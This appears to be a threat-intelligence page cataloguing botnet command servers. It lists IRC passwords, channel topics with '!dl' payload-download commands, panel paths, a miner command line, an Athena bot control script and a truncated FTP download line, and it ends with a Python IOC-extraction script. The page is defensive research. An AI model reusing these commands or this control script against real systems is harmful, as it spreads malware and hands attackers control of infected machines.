Resolved m.jamtes.com to 60.172.228.177
Server: m.jamtes.com
Port: 7384
Server password: smart
Channel: #spd
Channel password: smart
Channel topic #spd: !mod pdef on !mdns hxxp://146.185.246.240/avxd.gif !dl hxxp://146.185.246.190/msx6971.exe !dl hxxp://146.185.246.104/dqs.exe !s -o !j #1,#2 !dl hxxps://hotfile.com/dl/203712010/822c38b/skybe.exe
Channel topic #1: !dl hxxp://146.185.246.116/mailsw7.exe !dl hxxp://146.185.246.116/lmqw7.exe !dl hxxp://146.185.246.116/five192w7.exe !dl hxxp://146.185.246.116/five172w7.exe
Channel topic #2: !dl hxxp://146.185.246.116/tefw7.exe !dl hxxp://146.185.246.116/p98w7.exe !dl hxxp://146.185.246.116/p18w7.exe
beta.uandmearevideos1.com (Betabot http botnet hosted by cheaphosts.ru)
Resolved beta.uandmearevideos1.com to 146.185.246.147
Server: beta.uandmearevideos1.com
Gate file: /direct/mail/order.php
Alternate domains:
beta.uandmearevideos2.com
beta.stop2teaseme.com
beta.pixartzone.com
beta.dietmydart.com
beta.worldwipeme.com
beta.thegamejuststarted11.com
beta.thegamejuststarted13.com
beta.thegamejuststarted14.com
beta.thegamejuststarted15.com
beta.thegamejuststarted12.com
beta.thegamejuststarted10.com
beta.mypaintdress.com
Hosting infos: http://whois.domaintools.com/146.185.246.147
proxylegitconnect.com (Reverse proxy malware hosted by ecatel.net)
Resolved dq.proxylegitconnect.com to 89.248.172.174
Resolved bren.proxylegitconnect.com to 89.248.172.145
Servers: dq.proxylegitconnect.com, bren.proxylegitconnect.com
Port: 8800
Based on the port and subdomains, this is the same guy as in this previous post.
Hosting infos: http://whois.domaintools.com/89.248.172.174
Hosting infos: http://whois.domaintools.com/89.248.172.175
lxm.m94vo3.com (BitCoin Miner hosted in France Paris Gandi Sas)
Thanks to Aliss for the sample
Resolved : [lxm.m94vo3.com] To [92.243.23.55]
Resolved : [lxm.m94vo3.com] To [92.243.4.137]
minerd.exe -a scrypt -u fukkerrrr.1 -p x -s 15 --no-longpoll -q -o lxm.m94vo3.com:8080
(cpuminer/minerd options: -o is the pool the bot connects to, -u and -p the worker login, -s the retry pause in seconds; -a scrypt selects the scrypt algorithm, i.e. a Litecoin-style pool rather than SHA-256 Bitcoin mining)
sample here
hosting infos: http://whois.domaintools.com/92.243.23.55
Athena mIRC Script
Used by Athena customers for controlling the bot via IRC
;Athena mIRC Script
menu channel {
  -
  Athena
  .-
  .Misc
  ..Version:/msg $active !version
  ..Info:/msg $active !info
  ..Shell:{
    %AthenaVar = $$?="Command:"
    msg $active !shell %AthenaVar
  }
  ..-
  ..Block Host:{
    %AthenaVar = $$?="Host:"
    msg $active !http.block %AthenaVar
  }
  ..Redirect Host:{
    %AthenaVar1 = $$?="Original Host:"
    %AthenaVar2 = $$?="Redirect
mr7x0728.biz (Betabot http botnet hosted by alibabahost.com)
Resolved mr7x0728.biz to 37.221.165.118
Server: mr7x0728.biz
Gate file: /beta/order.php
For all the info about the owner's VPS you would ever need, just check this page: hxxp://mr7x0728.biz/p.php (it looks like he's splurged on the Standard VPS package)
Hosting infos: http://whois.domaintools.com/37.221.165.118
florasister.com (Ice-9 banking malware hosted by neoweb.ru)
Resolved florasister.com to 81.176.232.201
Server: florasister.com
Gate file: gigling.php (backup hxxp://forandroid.tk/yandex.php (suspended))
Sites checked for configs (no droppers appear to be live):
hxxp://www.jcurve.com/templates/beez/params.php
hxxp://www.ivemon.es/templates/beez/params.php
hxxp://www.justicecameroun.com/templates/beez/params.php
hxxp://www.jackwalshcarpets.com/Joomla/templates/beez/params.php
hxxp://www.kocaelidho.org.tr/templates/beez/params.php
hxxp://www.moraditrade.com/en/templates/beez/params.php
hxxp://www.mm-nn.com/main/templates/beez/params.php
hxxp://www.jakmurowane.pl/templates/beez/params.php
All of these sit under the Joomla "beez" template directory, so they are most likely compromised Joomla installs used as config hosts rather than domains the operator registered.
Also attempted to connect to bigdealworked.com on port 9702
Hosting infos: http://whois.domaintools.com/81.176.232.201
euclid.es (BetaBot hosted in Ukraine Kharkiv Infium Ltd)
This is from the anonymous guy here
Resolved : [euclid.es] To [188.190.98.30]
Panel: hxxp://euclid.es/147/order.php
Download URLs: hxxp://euclid.es/mnr1.exe
hosting infos: http://whois.domaintools.com/188.190.98.30
a55555a.dontexist.com (Andromeda Bot hosted in France Roubaix Ovh Systems)
This is from the anonymous guy here
Resolved : [a55555a.dontexist.com] To [188.165.87.109]
Panel: a55555a.dontexist.com/XMhXautVnLzlIC/image.php
hosting infos: http://whois.domaintools.com/188.165.87.109
rageevo.sytes.net (RageBot hosted in Chile Santiago Gtd Internet S.a.)
Resolved : [rageevo.sytes.net] To [190.196.122.227]
PASS pass
NICK raGe|PkfUmcvBta
USER ofmfn "fo8.net" "rage" :ofmfn
JOIN #Ev0-h4cK# ev0h4ck
Now talking in #Ev0-h4cK#
Topic On: [ #Ev0-h4cK# ] [ !xpl 100 1 190 -b 2 0 ]
Topic By: [DJ-L0rD|Ev0| ]
Modes On: [#Ev0-h4cK# ] [ +smntrul 500 ]
samples here: cmd /c echo open windowsupd.serveftp.com 21 >>
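The two IRC bots on this page (the m.jamtes.com bot whose channel topics carry !dl/!mdns download commands, and the RageBot handshake above) follow the same pattern: password-authenticated connect, a nick with a fixed prefix and random tail, a keyed channel, and a topic that is the command stream. The script below is an added example, not code from the original posts or from either bot's operator: it walks a constructed IRC transcript (the RageBot client lines from this entry, followed by a 332 RPL_TOPIC reply carrying part of the #spd topic from the m.jamtes.com entry; the server name irc.example is a placeholder), flags those traits, splits the topic into bot commands, follows !j to further channels, and turns the payload URLs into a defanged IOC list plus host:port pairs to block. The URLs stay defanged (hxxp) as on the page; the parser accepts both forms.

```python
"""Triage of an IRC-bot C2 session: flag handshake traits and pull IOCs from the topic."""
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

# Constructed transcript, not a real capture: ">" is client -> server, "<" is server -> client.
# Client lines are the RageBot handshake quoted in the rageevo.sytes.net entry; the 332 reply
# carries part of the #spd topic from the m.jamtes.com entry. "irc.example" is a placeholder.
SESSION = [
    "> PASS pass",
    "> NICK raGe|PkfUmcvBta",
    '> USER ofmfn "fo8.net" "rage" :ofmfn',
    "> JOIN #Ev0-h4cK# ev0h4ck",
    "< :irc.example 332 raGe|PkfUmcvBta #Ev0-h4cK# :!mod pdef on "
    "!mdns hxxp://146.185.246.240/avxd.gif !dl hxxp://146.185.246.190/msx6971.exe "
    "!s -o !j #1,#2 !dl hxxps://hotfile.com/dl/203712010/822c38b/skybe.exe",
]

URL_RE = re.compile(r"^h(?:xx|tt)ps?://\S+$", re.I)        # live or defanged
BOT_NICK_RE = re.compile(r"^([A-Za-z0-9-]{2,8})[|_\[]([A-Za-z0-9]{6,})\]?$")  # raGe|PkfUmcvBta shape
FETCH_VERBS = {"dl", "mdns"}  # topic verbs that, in the topics above, name a payload URL


def refang(url: str) -> str:
    return re.sub(r"^hxxp", "http", url, flags=re.I)


def defang(url: str) -> str:
    return re.sub(r"^http", "hxxp", url, flags=re.I)


def looks_random(tail: str) -> bool:
    """Mixed-case alphanumeric tails (PkfUmcvBta) are typical of generated bot nicks."""
    return any(c.islower() for c in tail) and any(c.isupper() for c in tail)


def split_topic_commands(topic: str) -> list:
    """'!mod pdef on !dl URL' -> [('mod', ['pdef', 'on']), ('dl', ['URL'])]."""
    out = []
    for chunk in re.split(r"\s+(?=![A-Za-z])", topic.strip()):
        if chunk.startswith("!"):
            verb, *args = chunk.split()
            out.append((verb[1:].lower(), args))
    return out


@dataclass
class Findings:
    indicators: list = field(default_factory=list)   # human-readable reasons
    server_password: Optional[str] = None
    nick: Optional[str] = None
    channels: dict = field(default_factory=dict)     # channel -> key (None if unknown)
    commands: list = field(default_factory=list)     # (verb, args) from the topic
    payload_urls: list = field(default_factory=list) # defanged
    hosts: set = field(default_factory=set)          # host:port to block


def analyze_session(lines: list) -> Findings:
    f = Findings()
    for line in lines:
        direction, _, msg = line.partition(" ")
        verb, _, rest = msg.strip().partition(" ")
        if direction == ">":
            verb = verb.upper()
            if verb == "PASS":
                f.server_password = rest
                f.indicators.append("server password sent with PASS")
            elif verb == "NICK":
                f.nick = rest
                m = BOT_NICK_RE.match(rest)
                if m and looks_random(m.group(2)):
                    f.indicators.append(f"nick {rest!r} is a fixed prefix plus random tail")
            elif verb == "USER":
                # USER <ident> <mode> <unused> :<realname>; the bot reuses the ident as realname
                if rest.split()[0] == rest.partition(":")[2]:
                    f.indicators.append("USER realname repeats the ident")
            elif verb == "JOIN":
                chans, *key_field = rest.split()
                keys = key_field[0].split(",") if key_field else []
                for i, chan in enumerate(chans.split(",")):
                    f.channels[chan] = keys[i] if i < len(keys) else None
                if keys:
                    f.indicators.append("channel joined with a key")
        elif direction == "<":
            m = re.match(r":\S+\s+332\s+\S+\s+(\S+)\s+:(.*)$", msg.strip())  # RPL_TOPIC
            if not m:
                continue
            chan, topic = m.groups()
            f.channels.setdefault(chan, None)
            f.commands = split_topic_commands(topic)
            if f.commands:
                f.indicators.append(f"topic of {chan} carries {len(f.commands)} bot commands")
            for cverb, args in f.commands:
                if cverb == "j":                      # !j #1,#2: more channels whose topics hold commands
                    for c in args[0].split(","):
                        f.channels.setdefault(c, None)
                if cverb in FETCH_VERBS:
                    for a in args:
                        if URL_RE.match(a):
                            live = refang(a)
                            parts = urlsplit(live)
                            port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
                            f.payload_urls.append(defang(live))
                            f.hosts.add(f"{parts.hostname}:{port}")
    return f


def is_bot_session(f: Findings) -> bool:
    """Topic-driven commands plus at least two handshake traits is a confident call."""
    return bool(f.commands) and len(f.indicators) >= 3
```

Running analyze_session(SESSION) yields five indicators, the channel key ev0h4ck, the two extra channels #1 and #2 queued from !j, three defanged payload URLs and the block list {146.185.246.240:80, 146.185.246.190:80, hotfile.com:443}. On a real capture the only change is that the topic arrives with live http:// URLs, which the same regex accepts.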